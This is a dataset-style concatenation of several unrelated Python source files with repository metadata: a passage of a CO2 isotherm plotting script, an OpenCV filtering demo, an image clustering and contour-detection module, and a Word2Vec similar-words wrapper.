v_HT_isoT230 = []
u_HT_isoT250 = []
v_HT_isoT250 = []
#
u_LH_isoT400 = []
v_LH_isoT400 = []
u_LH_isoT350 = []
v_LH_isoT350 = []
u_LH_isoT300 = []
v_LH_isoT300 = []
#
u_TP_isoT2166 = []
v_TP_isoT2166 = []
u_TP_isoT230 = []
v_TP_isoT230 = []
u_TP_isoT250 = []
v_TP_isoT250 = []
u_TP_isoT300 = []
v_TP_isoT300 = []
#
u_R_isoT230 = []
v_R_isoT230 = []
#
u_LL_isoT350 = []
v_LL_isoT350 = []
u_LL_isoT300 = []
v_LL_isoT300 = []
u_LL_isoT250 = []
v_LL_isoT250 = []
u_LL_isoT230 = []
v_LL_isoT230 = []
#
for i in range(len(u_HT_A)):
if T_HT_A[i] <=6.03e2 and T_HT_A[i]>=5.99e2:
u_HT_isoT400.append(u_HT_A[i]/1000)
v_HT_isoT400.append(v_HT_A[i])
if T_HT_A[i] <=3.51e2 and T_HT_A[i]>=3.48e2:
u_HT_isoT350.append(u_HT_A[i]/1000)
v_HT_isoT350.append(v_HT_A[i])
if T_HT_A[i] <=3.01e2 and T_HT_A[i]>=2.95e2:
u_HT_isoT300.append(u_HT_A[i]/1000)
v_HT_isoT300.append(v_HT_A[i])
if T_HT_A[i] <=2.31e2 and T_HT_A[i]>=2.21e2:
u_HT_isoT230.append(u_HT_A[i]/1000)
v_HT_isoT230.append(v_HT_A[i])
if T_HT_A[i] <=2.51e2 and T_HT_A[i]>=2.45e2:
u_HT_isoT250.append(u_HT_A[i]/1000)
v_HT_isoT250.append(v_HT_A[i])
#
for i in range(len(u_LH_B)):
# if T_LH_B[i] <=4.01e2 and T_LH_B[i]>=3.99e2:
# u_LH_isoT400.append(u_LH_B[i]/1000)
# v_LH_isoT400.append(v_LH_B[i])
if T_LH_B[i] <=3.51e2 and T_LH_B[i]>=3.497e2:
u_LH_isoT350.append(u_LH_B[i]/1000)
v_LH_isoT350.append(v_LH_B[i])
if T_LH_B[i] <=3.01e2 and T_LH_B[i]>=2.999e2:
u_LH_isoT300.append(u_LH_B[i]/1000)
v_LH_isoT300.append(v_LH_B[i])
#############################isobar two-phase####################################
for i in range(len(u_TP_E)):
if T_TP_E[i] <=2.167e2 and T_TP_E[i]>=2.164e2:
# print(T_TP_E[i])
u_TP_isoT2166.append(u_TP_E[i]/1000)
v_TP_isoT2166.append(v_TP_E[i])
if T_TP_E[i] <=2.3001e2 and T_TP_E[i]>=2.298e2:
u_TP_isoT230.append(u_TP_E[i]/1000)
v_TP_isoT230.append(v_TP_E[i])
if T_TP_E[i] <=2.5001e2 and T_TP_E[i]>=2.499e2:
u_TP_isoT250.append(u_TP_E[i]/1000)
v_TP_isoT250.append(v_TP_E[i])
if T_TP_E[i] <=3.001e2 and T_TP_E[i]>=2.999e2:
u_TP_isoT300.append(u_TP_E[i]/1000)
v_TP_isoT300.append(v_TP_E[i])
#################################R#########################################
for i in range(len(u_R_C)):
if T_R_C[i] <=2.301e2 and T_R_C[i]>=2.299e2:
u_R_isoT230.append(u_R_C[i]/1000)
v_R_isoT230.append(v_R_C[i])
#########################################################################
for i in range(len(u_LL_D)):
if T_LL_D[i] <=2.301e2 and T_LL_D[i]>=2.299e2:
u_LL_isoT230.append(u_LL_D[i]/1000)
v_LL_isoT230.append(v_LL_D[i])
if T_LL_D[i] <=2.5001e2 and T_LL_D[i]>=2.499e2:
u_LL_isoT250.append(u_LL_D[i]/1000)
v_LL_isoT250.append(v_LL_D[i])
if T_LL_D[i] <=3.001e2 and T_LL_D[i]>=2.999e2:
u_LL_isoT300.append(u_LL_D[i]/1000)
v_LL_isoT300.append(v_LL_D[i])
if T_LL_D[i] <=3.51e2 and T_LL_D[i]>=3.497e2:
u_LL_isoT350.append(u_LL_D[i]/1000)
v_LL_isoT350.append(v_LL_D[i])
########################################################################
plt.figure(figsize=(9,4))
#
plt.semilogx(sp_R[:,0],sp_R[:,2]/1e3,color='r',linewidth=2)
plt.semilogx(sp_R[:,1],sp_R[:,2]/1e3,color='k',linewidth=2)
plt.semilogx(sp_HT[:,0],sp_HT[:,2]/1e3,linestyle='--',color='k',linewidth=2)
plt.semilogx(sp_HT[:,1],sp_HT[:,2]/1e3,linestyle='--',color='k',linewidth=2)
plt.semilogx(sp_LH[:,0],sp_LH[:,2]/1e3,color='r',linewidth=2)
plt.semilogx(sp_LH[:,1],sp_LH[:,2]/1e3,linestyle='--',color='k',linewidth=2)
plt.semilogx(sp_LL[:,0],sp_LL[:,2]/1e3,linestyle='-',color='b',linewidth=2)
plt.semilogx(sp_LL[:,1],sp_LL[:,2]/1e3,linestyle='--',color='k',linewidth=2)
###############################################################################
plt.semilogx(v_HT_isoT400,u_HT_isoT400,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_HT_isoT350,u_HT_isoT350,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_HT_isoT300,u_HT_isoT300,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_HT_isoT250,u_HT_isoT250,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_HT_isoT230,u_HT_isoT230,color='k',linewidth=2,linestyle=':')
#
plt.semilogx(v_LH_isoT400,u_LH_isoT400,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LH_isoT350,u_LH_isoT350,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LH_isoT300,u_LH_isoT300,color='k',linewidth=2,linestyle=':')
#
plt.semilogx(v_R_isoT230,u_R_isoT230,color='k',linewidth=2,linestyle=':')
#
plt.semilogx(v_LL_isoT350,u_LL_isoT350,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LL_isoT300,u_LL_isoT300,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LL_isoT250,u_LL_isoT250,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_LL_isoT230,u_LL_isoT230,color='k',linewidth=2,linestyle=':')
#########################TWO-PHASE########################################
plt.semilogx(v_TP_isoT2166,u_TP_isoT2166,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_TP_isoT230,u_TP_isoT230,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_TP_isoT250,u_TP_isoT250,color='k',linewidth=2,linestyle=':')
plt.semilogx(v_TP_isoT300,u_TP_isoT300,color='k',linewidth=2,linestyle=':')
#####control des labels
ax = plt.gca()
#ax.set_xlim([0.015, 1e-1])
ax.set_ylim([-4.5e2, 3e2])
#plt.title('Isothermal curves',fontsize=17)
plt.ylabel('Internal Energy, e $[kJkg^{-1}]$',fontsize=15,position=(0,0.5),rotation = "vertical")
plt.xlabel('Specific Volume, v $[m^{-3}kg]$',fontsize=15,rotation = "horizontal")
plt.xticks(size = 12)
plt.yticks(size = 12)
plt.grid(True)
#plt.axis([-4,4,-0.3,1.5])
#plt.xlabel('X', color='C1')
#plt.ylabel('X', color='0.5') # grayscale color
#ax.xaxis.set_label_coords(0.5,-0.05)
#ax.yaxis.set_label_coords(-0.08,0.5)
#####################################
ax.text(2.0e-2,200, '$600K$', fontsize=10)
ax.text(2.1e-2,-25, '$350K$', fontsize=10)
ax.text(2.8e-3,-200, '$300K$', fontsize=10)
ax.text(0.9e-2,-210, '$250K$', fontsize=10)
ax.text(2.0e-2,-210, '$230K$', fontsize=10)
ax.text(3.3e-2,-210, '$216.6K$', fontsize=10)
#############################################################################
plt.tight_layout()
plt.savefig("isotherm.pdf")
plt.show()
| yufang67/CO2-look-up-table | program/isotherm.py | isotherm.py | py | 7,331 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "numpy.loadtxt",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_numb... |
3859314216 | import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('../Images/abc.png')
kernel = np.ones((9, 9), np.float32) / 10
print(kernel)
dst = cv2.filter2D(img, -1, kernel)
cv2.imshow("imange",dst)
cv2.waitKey(0)
cv2.destroyAllWindows() | trunghopro098/Image-Processing | ProcessImg/Filter2D.py | Filter2D.py | py | 263 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "cv2.imread",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "cv2.filter2D",
"line_number... |
21253725938 | from objdetection1 import *
import cv2 as cv
import numpy as np
from PIL import Image
import random
import math
def make_cluster(img):
Z = img.reshape((-1,3))
# convert to np.float32
Z = np.float32(Z)
# define criteria, number of clusters(K) and apply kmeans()
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
K = 4
ret,label,center=cv.kmeans(Z,K,None,criteria,10,cv.KMEANS_RANDOM_CENTERS)
# Now convert back into uint8, and make original image
center = np.uint8(center)
center[0] = (0,0,0)
center[1] = (200,200,200)
# center[2] = (100,0,0)
# center[3] = (0,100,0)
# center[0] = (0,0,100)
res = center[label.flatten()]
res2 = res.reshape((img.shape))
# cv.imshow('res2',res2)
return res2
def createCandidatePositions(img):
candidates = []
bboxes = []
# convert image to grayscale image
gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
# for i in range(10):
# cv.GaussianBlur(gray_image,(5,5),0)
kernelClose = np.ones((50,50),np.uint8)
kernelErode = np.ones((20,20),np.uint8)
# kernelClose = np.ones((img.shape[1]//500,img.shape[0]//500),np.uint8)
# kernelErode = np.ones((img.shape[1]//300,img.shape[1]//300),np.uint8)
closing = cv.morphologyEx(gray_image, cv.MORPH_CLOSE, kernelClose)
closing = cv.morphologyEx(closing, cv.MORPH_ERODE, kernelErode)
closing = make_cluster(closing)
edges = cv.Canny(closing,400,425,apertureSize = 3)
# cv.imshow('res2',edges)
# calculate moments of binary image
# find contours in the binary image
contours, hierarchy = cv.findContours(edges,cv.RETR_TREE,cv.CHAIN_APPROX_SIMPLE)
# cv.drawContours(img, contours, -1, (255,0,0), 3)
for c in contours:
x,y,w,h = cv.boundingRect(c)
cv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)
candidates.append(img[y:y+h,x:x+w])
bboxes.append((x,y,(x+w),(y+h)))
# calculate moments for each contour
M = cv.moments(c)
area = cv.contourArea(c)
# cv.imshow('aids', img)
# cv.waitKey(0)
# cv.destroyAllWindows()
return np.array(candidates), np.array(bboxes)
| DvnGBulletZz/Computer_Vision_Kenan | Eind_Opdracht/clustering.py | clustering.py | py | 2,219 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.float32",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.TERM_CRITERIA_EPS",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "cv2.TERM_CRITERIA_MAX_ITER",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name... |
31875266103 | # from .word2vec_functions.text_processing_functions import *
from .word2vec_functions.word2vec_companion import similar_words
from gensim.models import Word2Vec
import json
BASE_PATH = 'w2v/word2vec_functions/'
def load_filters():
with open(BASE_PATH + 'Raw Data/test_data.json', 'r') as file:
test_data = json.load(file)
# abstract = test_data['test_abstract']
# paper = test_data['test_paper']
sweet_words = test_data['sweet_words']
sweet_dict = test_data['sweet_dict']
sweet_dict['all'] = sweet_words
instrument_types = test_data['instrument_types']
filters = sweet_dict
filters['instruments'] = instrument_types
# filters = {'instruments': instrument_types,
# 'all': sweet_dict}
return filters
def load_models():
model = Word2Vec.load(BASE_PATH + 'Trained Models/model_e300_s150_w10_m3.model')
tuple_model = Word2Vec.load(BASE_PATH + 'Trained Models/TupleExtractions_e300_s150_w10_m3.model')
models = {'traditional': model,
'tuple': tuple_model}
return models
def load_translations():
with open(BASE_PATH + 'Processed Training Data/papers_translations.json', 'r') as file:
translations = json.load(file)
return translations
def similar_word_list_wrapper(positive_words, negative_words, filter_vocab):
filters = load_filters()
models = load_models()
translations = load_translations()
model = models['traditional']
print('positive words', positive_words)
print('negative words', negative_words)
print(filter_vocab)
similar_word_list = similar_words(positive_words, negative_words, translations, model,
verbose = False,
words_returned = 20,
limited_vocabulary = filter_vocab)
return similar_word_list
| CarsonDavis/InteractiveWord2VecWebsite | w2v/utils.py | utils.py | py | 1,911 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "gensim.models.Word2Vec.load",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "gensim.models.Word2Vec",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "gensim.m... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.